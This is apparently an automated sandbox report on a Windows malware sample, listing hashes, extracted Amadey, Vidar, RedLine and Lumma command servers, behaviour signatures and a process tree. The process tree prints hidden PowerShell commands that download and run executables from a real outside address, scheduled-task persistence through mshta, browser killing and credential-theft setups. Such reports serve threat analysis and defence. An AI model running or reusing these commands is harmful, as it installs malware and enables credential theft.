Analysis

  • max time kernel
    77s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    21-02-2025 13:05

General

  • Target

    ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe

  • Size

    2.0MB

  • MD5

    c2c6cc5d4019b416d4a9ca209a7ba05d

  • SHA1

    79e755bf745e4b6edfdd244cda8cd5b27cc93892

  • SHA256

    ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305

  • SHA512

    2844cc2a9a6bce504bd0b42abd1f565920c284a4d85d67b154bd8c6e6cdbaf421eb91e29be741dd53e51c6ed097d1472be868e4f38039844b72a4a5d21b1d925

  • SSDEEP

    49152:eDRjeHrejAd2+D5bkclFFOFaRBsd/pwA:6eHrejAw+lbkclF/Bmp9

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

lumma

C2

https://prideforgek.fun/api

https://pausedcritiaca.fun/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 26 IoCs
  • Detects Healer an antivirus disabler dropper 4 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 16 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 18 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 28 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe
    "C:\Users\Admin\AppData\Local\Temp\ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe
        "C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"
        3⤵
        • Executes dropped EXE
        PID:1872
      • C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe
        "C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2016
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1356
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:2768
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef60a9758,0x7fef60a9768,0x7fef60a9778
              6⤵
                PID:1132
              • C:\Windows\system32\ctfmon.exe
                ctfmon.exe
                6⤵
                  PID:1464
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:2
                  6⤵
                    PID:2208
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:8
                    6⤵
                      PID:2052
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:8
                      6⤵
                        PID:944
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2132 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:2956
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2140 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:2380
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1420 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:2
                        6⤵
                          PID:748
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1332 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:2804
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3456 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:8
                          6⤵
                            PID:1780
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3592 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:8
                            6⤵
                              PID:3064
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3704 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:8
                              6⤵
                                PID:2820
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3832 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:8
                                6⤵
                                  PID:2680
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3476 --field-trial-handle=1204,i,6768357841772497809,2994670009198192078,131072 /prefetch:8
                                  6⤵
                                    PID:1724
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\8yu37" & exit
                                  5⤵
                                    PID:2180
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 10
                                      6⤵
                                      • Delays execution with timeout.exe
                                      PID:1840
                              • C:\Users\Admin\AppData\Local\Temp\1090366101\5e031624c1.exe
                                "C:\Users\Admin\AppData\Local\Temp\1090366101\5e031624c1.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                • Suspicious use of WriteProcessMemory
                                PID:1676
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn bDCf3ma67Kr /tr "mshta C:\Users\Admin\AppData\Local\Temp\Y97Zp3SbP.hta" /sc minute /mo 25 /ru "Admin" /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:2680
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /create /tn bDCf3ma67Kr /tr "mshta C:\Users\Admin\AppData\Local\Temp\Y97Zp3SbP.hta" /sc minute /mo 25 /ru "Admin" /f
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:600
                                • C:\Windows\SysWOW64\mshta.exe
                                  mshta C:\Users\Admin\AppData\Local\Temp\Y97Zp3SbP.hta
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of WriteProcessMemory
                                  PID:2844
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                    5⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Downloads MZ/PE file
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:2972
                                    • C:\Users\Admin\AppData\Local\TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE
                                      "C:\Users\Admin\AppData\Local\TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE"
                                      6⤵
                                      • Modifies Windows Defender DisableAntiSpyware settings
                                      • Modifies Windows Defender Real-time Protection settings
                                      • Modifies Windows Defender TamperProtection settings
                                      • Modifies Windows Defender notification settings
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Windows security modification
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1924
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" "
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:816
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" any_word
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:1304
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 2
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Delays execution with timeout.exe
                                    PID:1780
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:1236
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2564
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:564
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1400
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1708
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2368
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /create /tn "NLwBMmaYBVo" /tr "mshta \"C:\Temp\RYg791F5T.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2104
                                  • C:\Windows\SysWOW64\mshta.exe
                                    mshta "C:\Temp\RYg791F5T.hta"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Modifies Internet Explorer settings
                                    PID:2740
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      6⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Downloads MZ/PE file
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2676
                                      • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                        7⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1736
                              • C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
                                "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Modifies system certificate store
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2892
                              • C:\Users\Admin\AppData\Local\Temp\1090383001\9e04320a1e.exe
                                "C:\Users\Admin\AppData\Local\Temp\1090383001\9e04320a1e.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Modifies system certificate store
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2860
                              • C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe
                                "C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1188
                              • C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe
                                "C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1096
                              • C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe
                                "C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:2080
                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                  4⤵
                                    PID:864
                                • C:\Users\Admin\AppData\Local\Temp\1090387001\e6b2e9e02f.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1090387001\e6b2e9e02f.exe"
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2400
                                • C:\Users\Admin\AppData\Local\Temp\1090388001\1a1a5509ba.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1090388001\1a1a5509ba.exe"
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Modifies system certificate store
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1644
                                • C:\Users\Admin\AppData\Local\Temp\1090389001\e89845e0ef.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1090389001\e89845e0ef.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:2744
                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                    4⤵
                                      PID:2892
                                  • C:\Users\Admin\AppData\Local\Temp\1090390001\b70356bd87.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1090390001\b70356bd87.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:1884
                                  • C:\Users\Admin\AppData\Local\Temp\1090391001\10a73c1d44.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1090391001\10a73c1d44.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1448
                                  • C:\Users\Admin\AppData\Local\Temp\1090392001\afc80b34db.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1090392001\afc80b34db.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2248
                                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                      4⤵
                                        PID:1260
                                    • C:\Users\Admin\AppData\Local\Temp\1090393001\a12fc2bfc5.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1090393001\a12fc2bfc5.exe"
                                      3⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1420
                                    • C:\Users\Admin\AppData\Local\Temp\1090394001\533ca8cb43.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1090394001\533ca8cb43.exe"
                                      3⤵
                                        PID:1536
                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                          4⤵
                                            PID:1664
                                        • C:\Users\Admin\AppData\Local\Temp\1090395001\3ee6b00e4f.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1090395001\3ee6b00e4f.exe"
                                          3⤵
                                            PID:580
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 800
                                              4⤵
                                              • Program crash
                                              PID:2668
                                          • C:\Users\Admin\AppData\Local\Temp\1090396001\d67a09fdaa.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1090396001\d67a09fdaa.exe"
                                            3⤵
                                              PID:2280
                                            • C:\Users\Admin\AppData\Local\Temp\1090397001\a29513f871.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1090397001\a29513f871.exe"
                                              3⤵
                                                PID:1720
                                              • C:\Users\Admin\AppData\Local\Temp\1090398001\1076af0731.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1090398001\1076af0731.exe"
                                                3⤵
                                                  PID:1512
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM firefox.exe /T
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:1904
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM chrome.exe /T
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:1400
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM msedge.exe /T
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:2564
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM opera.exe /T
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:448
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM brave.exe /T
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:1640
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                    4⤵
                                                      PID:2264
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
